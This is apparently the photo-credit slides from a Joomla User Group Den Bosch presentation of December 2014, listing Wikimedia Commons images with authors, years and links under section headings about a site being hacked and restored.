http://commons.wikimedia.org/wiki/File:Phishing.JPG Spam 2 - Bodo Akdeniz, 2005 http://commons.wikimedia.org/wiki/File:Spam_2.jpg Plugboard wires - Daniel Sancho, 2005 http://commons.wikimedia.org/wiki/File:Plugboard_wires.ds.jpg
- 56. Joomla User GGrroouupp DDeenn BBoosscchh –– 11 ddeecceemmbbeerr 22001144 Used Photos WAC telephone operators operate the Victory switchboard during the Potsdam Conference in their headquarters in - U.S. National Archives and Records Administration, 1945 http://commons.wikimedia.org/wiki/File:WAC_telephone_operators_operate_the_Victory_switchboard _during_the_Potsdam_Conference_in_their_headquarters_in..._-_NARA_-_199007.jpg Butterfly Labs Bitcoin miner - arstechnica.com, 2013 http://cdn.arstechnica.net/wp-content/uploads/2013/05/IMG_6048-Version-3.jpg Cirencester, market place - Tony Grist, 2008 http://commons.wikimedia.org/wiki/File:Cirencester,_market_place.jpg 2. Hacked Youve-been-hacked, Hanonen, 2014 http://commons.wikimedia.org/wiki/File:Youve-been-hacked.jpg Piedbiche - Isabelle Grosjean, 2001 http://commons.wikimedia.org/wiki/File:Piedbiche.jpg 3. SSH connectie Switchboard Manual - Peel Conner, Geez-oz, 2012 http://commons.wikimedia.org/wiki/File:Switchboard_Manual_-_Peel_Conner.JPG Bundesarchiv Bild 183-2008-0516-500, Fernschreibmaschine mit Telefonanschluss - Illger, Willi, 1930 http://commons.wikimedia.org/wiki/File:Bundesarchiv_Bild_183-2008-0516-500,_Fernschreibmaschin e_mit_Telefonanschluss.jpg
- 57. Joomla User GGrroouupp DDeenn BBoosscchh –– 11 ddeecceemmbbeerr 22001144 Used Photos 4. Procedure Motorola M6800 manuals - Michael Holley, 2010 http://commons.wikimedia.org/wiki/File:Motorola_M6800_manuals.jpg Backup IBM 7330 on white background, Crisco 1492, 2013 http://commons.wikimedia.org/wiki/File:IBM_7330_on_white_background.jpg Analyse Postcards and magnifying glass, Anna, 2007 http://commons.wikimedia.org/wiki/File:Postcards_and_magnifying_glass.jpg Magnifying glass on antique table - Stéphane Magnenat, 2008 http://commons.wikimedia.org/wiki/File:Magnifying_glass_on_antique_table.jpg Magnifying glass - Faberge - shakko, 2011 http://commons.wikimedia.org/wiki/File:Magnifying_glass_-_Faberge.jpg Binary Code, Cncplayer, 2013 http://commons.wikimedia.org/wiki/File:Binary_Code.jpg Two different shoes on, Kelly Bailey, 2007 http://commons.wikimedia.org/wiki/File:Two_different_shoes_on.jpg Herstel IBM 650 at Texas A&M open for repair - Cushing Memorial Library and Archives, Texas A&M, 2009 http://commons.wikimedia.org/wiki/File:IBM_650_at_Texas_A%26M_open_for_repair.jpg Conclusie EquinoxeJuniorHighPac-Man - Equinoxe, 2012 http://www.c64-wiki.com/index.php/File:EquinoxeJuniorHighPac-Man.png